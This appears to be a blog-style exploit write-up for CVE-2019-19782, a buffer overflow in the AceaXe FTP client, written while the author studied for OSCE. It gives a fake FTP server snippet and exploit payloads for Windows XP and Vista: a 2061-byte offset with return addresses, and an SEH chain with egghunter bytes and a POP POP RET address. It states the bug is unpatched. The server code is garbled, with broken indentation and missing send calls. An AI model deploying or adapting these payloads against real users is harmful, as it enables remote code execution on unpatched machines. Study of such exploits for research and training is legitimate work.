👾RCE via Buffer Overflow - AceaXeFTP [CVE-2019-19782]

It’s Possible to trigger a buffer overflow, in AceaXeFTP client, by hosting a malicious ftp server and sending malicious responses to the client.

Bin info:

Name: AceaXe + Homepage: http://www.labf.com/aceaxeplus/index.html

Proof of Concept (PoC):

Studying to take the OSCE exam, i was simply fascinated by the Exploit dev topic, ASLR Bypass and SEH based exploits, was something that i needed to see in the internet jungle.

Doing the exercises, i was able to successfuly exploit one of the examples. So, i thought “Yeah, it’s time to find a really old software that i could run in a windows vista and try to find some AAAA shenanigans”, and that’s what i did, got first a windows xp and windows vista vm running and the AceaXe software bundle installed.

At first, as i was really confortable with the basics of exploit dev, because of the OSCP background, i tried finding something in the windows xp, as it would not have ASLR nor DEP, so it would be easy to exploit.

As i was researching i found a lot of PoCs of ftp clients that got exploited by sending the response of the ftp commands with the exploit code. so, after some hours of trying a lot of gui overflows and file sizes oveflows, I finnally tried creating my own fake FTP server in python and sending the famous EHLO response with a giant string &afterwords, and it worked, EIP was finnaly overwritten by the AAAAs !

Finnally ! Time to exploit (winXP version):

The concept was easy. Create a simple socket listening to port 21, that sends the string after the client connects to it.

port = 21                   
s = socket.socket()
host = ''              
	s.bind((host, port))            
	print ('[+] Ouvindo na porta 21.')
	print ('[-] Problemas no socket, veja se a porta 21 ja esta sendo utilizada')
while True:
	    conn, addr = s.accept()
	    print ('[+] Envindo o payload')     
	    print ('[+] Payload enviado com sucesso')
		print ('[-] Tivemos um prolema, veja se tudo foi settado corretamente')

So, after Creating a FTP server I was able to send the malicious Buffer, to exploit this vulnerability. and after doing all the steps needed to create the simple buffer overflow i was able to retrieve a Command shell on the machine By sending the following payload, i was able to take control of the EIP

jmpesp = "\x96\x72\x01\x68"
lixo = "\x41"*2061
nopsled = "\x90"*20
eip = '\x6F\x4A\x08\x68'

payload = lixo+eip+jmpesp+nopsled+shellcode+nopsled     

dadosenviados = '220'+payload+'\r\n'

So, nothing new there, just a classic default buffer overflow, but i was so happy that i have found it haha. It was time to exploit it in windows vista, to smack some windows ASLRs. I exploited it using a SEH based Buffer overflow, and by using the egghunter technique. the Code used to exploit it was:

lixo1 = "\x41"*100
lixo2 = "D" * (9266-len(shellcode))
lixo3 = "C" * 576
nopsled = "\x90"*20

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

egg = "w00tw00t"

nseh = "\x90\x90\xEB\x05" 
seh = "\xF8\x54\x01\x68" #POP POP RET 680154F8 in WCMDPA10.DLL

payload = lixo1 + egg + nopsled + shellcode + lixo2 + nseh + seh + egghunter + lixo3

dadosenviados = '220'+payload+'\r\n'

The vulnerability is, by this time (dez/2019), working. I tried contact with the vendor, but didn`t received any response. And there are several other vulnerabilities to exploit in this software, so if you guys want some study material. this one is recommended.



Last updated